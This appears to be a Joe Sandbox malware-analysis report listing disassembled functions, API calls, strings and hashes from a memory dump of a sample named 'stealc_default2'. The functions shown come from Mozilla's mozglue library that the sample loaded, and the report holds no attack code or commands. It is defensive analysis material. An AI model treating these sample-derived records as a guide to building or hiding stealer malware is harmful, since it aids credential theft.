MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BF9E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BF9E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BF9E722, 6BF9E750, 6BF9E7A2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: ad32aed1e53b40c6c8bea78826ae7d2a3a8c64be74222d1b9d6cbcfd09876186
Instruction ID: 73d562d42374aeb8fb3ec3f9f68d5f558e1e3c40e019f3c57e69b9b96d55702b
Opcode Fuzzy Hash: ad32aed1e53b40c6c8bea78826ae7d2a3a8c64be74222d1b9d6cbcfd09876186
Instruction Fuzzy Hash: AC029C766103059FDB10DF28D484B6ABBF5FF89304F04496CE99687361DB38E949CB92

Function 6BFC2AB0 Relevance: 31.4, APIs: 19, Instructions: 7600COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6BFC5559
memset.VCRUNTIME140(00000001,000000FF,80808082), ref: 6BFC5733
memcpy.VCRUNTIME140(00000001,?,?), ref: 6BFC8323
memcpy.VCRUNTIME140(?,?,00040020), ref: 6BFC8356
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6BFC83D9

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpymemset$malloc
String ID:
API String ID: 3674098821-0
Opcode ID: f8f38d4d76d8a856c9081844f45ea12918952a95d4bb7600998c78eedbfa3d75
Instruction ID: 8db87e470acc71828e1262f53db5eee5ec5a2ec6a2bcdde8ad651b41405f0ee1
Opcode Fuzzy Hash: f8f38d4d76d8a856c9081844f45ea12918952a95d4bb7600998c78eedbfa3d75
Instruction Fuzzy Hash: 5BE32A72E0421A8FCB14CFA8C8906EEF7B2BF89304F2581A9D549A7355D734AD85CF91

Function 6BF84AA0 Relevance: 21.8, APIs: 16, Instructions: 1805COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00004014), ref: 6BF84ACE
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6BF84E81
memcpy.VCRUNTIME140(?,?,?), ref: 6BF84EC7

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: ec6bd58774f70af802ac8a9e24f674dd9a38399e1bd84c3bf8050c19bf0a7d3f
Instruction ID: b11ae43de3a9c0a7a200f0fefa61397d9176c7768f9c8ce465f2ec737fede4c8
Opcode Fuzzy Hash: ec6bd58774f70af802ac8a9e24f674dd9a38399e1bd84c3bf8050c19bf0a7d3f
Instruction Fuzzy Hash: B6F26C72E0421ACFCB18CFA8C8906EDB7F2FF49310F144269D956AB365D735A945CB90

Function 6BF522A0 Relevance: 14.6, APIs: 4, Strings: 5, Instructions: 1086COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6BF71A70), ref: 6BF522E1
memset.VCRUNTIME140(?,000000E5,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF52327
LeaveCriticalSection.KERNEL32(?), ref: 6BF523AE
memset.VCRUNTIME140(?,000000E5,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF5259E

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6BF52F74, 6BF53015, 6BF53030
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6BF52F91
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6BF52FA6
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6BF52FBB
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6BF52FD0

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeave
String ID: MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 1254101903-1470650218
Opcode ID: f26bb0cf573d9637f5c70b377ffdfb716bef6f36e1951b9715df3179e8306989
Instruction ID: c0c260c85afa2ffdca5de95c944bd22d898a33912ccf7a29237f5001a57983a8
Opcode Fuzzy Hash: f26bb0cf573d9637f5c70b377ffdfb716bef6f36e1951b9715df3179e8306989
Instruction Fuzzy Hash: B0926D73A157028FC714CF28C580605FBE1BF96724B19C7ADE8699B3A1D37AE851CB81

Function 6BF95190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BF951DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BF9529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BF952FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BF9536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BF953F7

Part of subcall function 6BF8AB89: EnterCriticalSection.KERNEL32(6BFDE370,?,?,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284), ref: 6BF8AB94
Part of subcall function 6BF8AB89: LeaveCriticalSection.KERNEL32(6BFDE370,?,6BF534DE,6BFDF6CC,?,?,?,?,?,?,?,6BF53284,?,?,6BF756F6), ref: 6BF8ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BF956C3
__Init_thread_footer.LIBCMT ref: 6BF956E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BF956BE

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 0debd9cddba335136eee4bd5f14259a06729a60a8b61633c0cbda68b5dc51e01
Instruction ID: 7163a1041efd8db857da300819194334efcb7e0f940c4281005d8e58fdba4a8d
Opcode Fuzzy Hash: 0debd9cddba335136eee4bd5f14259a06729a60a8b61633c0cbda68b5dc51e01
Instruction Fuzzy Hash: EEE1B276854F45CAD713DF38941022BB7B6BF9B385F109B4EE8AE2A560DF34E4868701

Function 6BF7C0E0 Relevance: 11.2, APIs: 4, Strings: 2, Instructions: 728COMMON

Download Yara Rule

Strings

MOZ_CRASH(), xrefs: 6BF7D4BB
0123456789abcdef, xrefs: 6BF7C317

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID:
String ID: 0123456789abcdef$MOZ_CRASH()
API String ID: 0-3968268099
Opcode ID: 896c3cc1260184ad034f56e3b2efb33b2cf1b3844f40ee56640abbca623329d5
Instruction ID: 1c2774e97e87c587bcb04193b969a0caf7ecac5f9242903236cd54c3016b37d2
Opcode Fuzzy Hash: 896c3cc1260184ad034f56e3b2efb33b2cf1b3844f40ee56640abbca623329d5
Instruction Fuzzy Hash: B9523376A483018FD734DF28D45079AB7E2FB86314F5489BEE8DA873A1C7399845CB42

Function 6BFBB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF69B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BFBB92D), ref: 6BF69BC8
Part of subcall function 6BF69B80: __Init_thread_footer.LIBCMT ref: 6BF69BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BF603D4,?), ref: 6BFBB955
NtQueryVirtualMemory.NTDLL ref: 6BFBB9A5
NtQueryVirtualMemory.NTDLL ref: 6BFBBA20
RtlNtStatusToDosError.NTDLL ref: 6BFBBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BFBBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BFBBA86

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 4ecbe4cdbf28b9befcd2f7724f70eb08a87befda1d1d9805d798f00303d72ffc
Instruction ID: cfddc88e5fac57dac64d95b148d51ecce7ee61f7fb6ccf5776b908bf3e497485
Opcode Fuzzy Hash: 4ecbe4cdbf28b9befcd2f7724f70eb08a87befda1d1d9805d798f00303d72ffc
Instruction Fuzzy Hash: BF518F72E0021ADFDF14CFA9D8C1ADEB7BAEF88714F104529E901B7265DB34AD418B91

Function 6BF98AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BF8FA80: GetCurrentThreadId.KERNEL32 ref: 6BF8FA8D
Part of subcall function 6BF8FA80: AcquireSRWLockExclusive.KERNEL32(6BFDF448), ref: 6BF8FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BFB1563), ref: 6BF98BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BFB1563), ref: 6BF98C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BFB1563), ref: 6BF98C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BFB1563), ref: 6BF98CBA
free.MOZGLUE(?), ref: 6BF98CCF

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: f33af77128ad47212afa98a3bcbde92cb4b45ee213f9cc3bf1b9b78a296496c8
Instruction ID: ac63d65ae38bb6a6e787c8fe7db8639adc8cdbf20ebdbc11be8d1811b657b0ba
Opcode Fuzzy Hash: f33af77128ad47212afa98a3bcbde92cb4b45ee213f9cc3bf1b9b78a296496c8
Instruction Fuzzy Hash: 5A71A176A14B01CFD708DF29D480626B7F1FF99314F058A9EE9999B362E774E880CB41

Function 6BF5F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6BF5F2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6BF5F2F0
NtQueryVirtualMemory.NTDLL ref: 6BF5F308
RtlNtStatusToDosError.NTDLL ref: 6BF5F36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BF5F371

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: 86043f9d1595586494731316c76fb3b5856a7b024c28da0d8d4fa55037c22b58
Instruction ID: df25ea50081d4d5fa8fff67ea7b10bdf096938ada397af1dd0901ca7a5d81aeb
Opcode Fuzzy Hash: 86043f9d1595586494731316c76fb3b5856a7b024c28da0d8d4fa55037c22b58
Instruction Fuzzy Hash: FB219173A013099BFB508A65CD55BEF77B8AB44358F1042B9E420961E0D7BC9AA8C761

Function 6BF55340 Relevance: 7.1, APIs: 4, Instructions: 1077COMMON

Download Yara Rule

APIs

ceil.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BF55406
memcpy.VCRUNTIME140(?,?,?,?), ref: 6BF557F6

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ceilmemcpy
String ID:
API String ID: 748650655-0
Opcode ID: a15b5a6cf2f699184314ddfed8d0c623030cd41fa27fae7e19f3305cb7dee4de
Instruction ID: 36c4b98d734ed69e838e22a75cee073598db48a35e1859a5d62b51bdca7332c7
Opcode Fuzzy Hash: a15b5a6cf2f699184314ddfed8d0c623030cd41fa27fae7e19f3305cb7dee4de
Instruction Fuzzy Hash: 0592A173A087518BC714CF28C88079FB7E2BFD8714F154A2DE99997360D739A865CB82

Function 6BFC53C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6BFC86AE

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction ID: 7b728fbdb87a97d215959c91bd5a6f98758d0d192dd7891a7f6ace226dcdb39b
Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
Instruction Fuzzy Hash: F1C1C273A0011B8FCB14CE68CC91BEAB7B2EF85314F1542A9C949EB355D734A9C9CB91

Function 6BFC50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6BFC8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6BFC925C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 40cd4aa591289412f2b75c088b6dcf4557f00a081c20888892faf3f50589ead7
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: D9A1D473E0011B8BCB14CE68CC817EAB7B2AF85314F1542B9C949EB395D734A9D9CB91

Function 6BF5C9A0 Relevance: 4.9, APIs: 3, Instructions: 401COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6BF5C9B8
__aullrem.LIBCMT ref: 6BF5C9D5
__aulldiv.LIBCMT ref: 6BF5C9E9

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: 612058c565d8dfe11c540b5902d1cd7536720848508e5d75adec41c70616758b
Instruction ID: 131350a944aa50a10cedbc469de21caa788dc3ea7909a026050fb7f2f5020014
Opcode Fuzzy Hash: 612058c565d8dfe11c540b5902d1cd7536720848508e5d75adec41c70616758b
Instruction Fuzzy Hash: 04E12732B045068FCB18CE2CC8919A6BBE6EF99310B19866DE855DF396D735ED01C7D0

Function 6BF7A940 Relevance: 4.2, APIs: 2, Instructions: 1239COMMON

Download Yara Rule

APIs

ceil.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BF7AAD4
ceil.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BF7B15F

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ceil
String ID:
API String ID: 3069211559-0
Opcode ID: cd69199c173d33b21f99a2bc6b5dc84d9a5db8c4b5bd487c20a844f728799cd4
Instruction ID: f780ff4f4511459bc4ccb97cda18fa9f86169120dc4bb4ddc79bb6969b40bf26
Opcode Fuzzy Hash: cd69199c173d33b21f99a2bc6b5dc84d9a5db8c4b5bd487c20a844f728799cd4
Instruction Fuzzy Hash: ECB22972A087518FC314CF2DC49065AF7E2BFC9710F158A6EF8A9973A1D774E8458B82

Function 6BFAB970 Relevance: 3.9, APIs: 3, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,00100000,?,6BFAD115,?,?,?,?,00000000,?,6BF9DA31,00100000,?,?,00000000), ref: 6BFABA40
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,00100000,?,6BFAD115,?,?,?,?,00000000,?,6BF9DA31,00100000,?,?,00000000), ref: 6BFABAEB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,6BFAD115,?,?,?,?,00000000,?,6BF9DA31,00100000,?,?), ref: 6BFABB7D

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: b78b77cf09c9a94bdda9dfc6ee152c78b93a5a0a3ba3f9b93d2a1c8b333d7db8
Instruction ID: e75ebb96f616f022ff0b9e38556ec8c68e2c4b31988315c2cad22c5ea7075dcc
Opcode Fuzzy Hash: b78b77cf09c9a94bdda9dfc6ee152c78b93a5a0a3ba3f9b93d2a1c8b333d7db8
Instruction Fuzzy Hash: CA610672A0020BCFDB18CF68C5906AEF7B2FF85304F554A6DC81597272EB34A955CB90

Function 6BFBB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BF603D4,?), ref: 6BFBB955
NtQueryVirtualMemory.NTDLL ref: 6BFBB9A5

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: d04d89ed421e423420c8df15f4a613557c238c99c095ea0d00e68a81c55522d5
Instruction ID: 8c2b38ea5bcb71dfa043b8a8bec6976f085fb90e4493e9bdeb2d62830b30278a
Opcode Fuzzy Hash: d04d89ed421e423420c8df15f4a613557c238c99c095ea0d00e68a81c55522d5
Instruction Fuzzy Hash: 6E41D672E002199FDF04CFB9D881A9EB7B6EFC8354F14852AE805A7365DB34A9458B90

Function 6BFB2990 Relevance: 1.8, APIs: 1, Instructions: 322COMMON

Download Yara Rule

APIs

sqrt.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6BFB2BB7

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: sqrt
String ID:
API String ID: 1201437784-0
Opcode ID: 266668ffa571b5eba2491e8f42351414be35c6a9dc1e2e2e90e402aa5ce934ce
Instruction ID: 90b81af3c1af646ff5e201974a0e21c2366b94dd56e3ea89bedaaaec4112731a
Opcode Fuzzy Hash: 266668ffa571b5eba2491e8f42351414be35c6a9dc1e2e2e90e402aa5ce934ce
Instruction Fuzzy Hash: E5D1B172918B418FC316CF39C49061AF7E5BFDA394F158B2EF856A7211DB30E8568B81

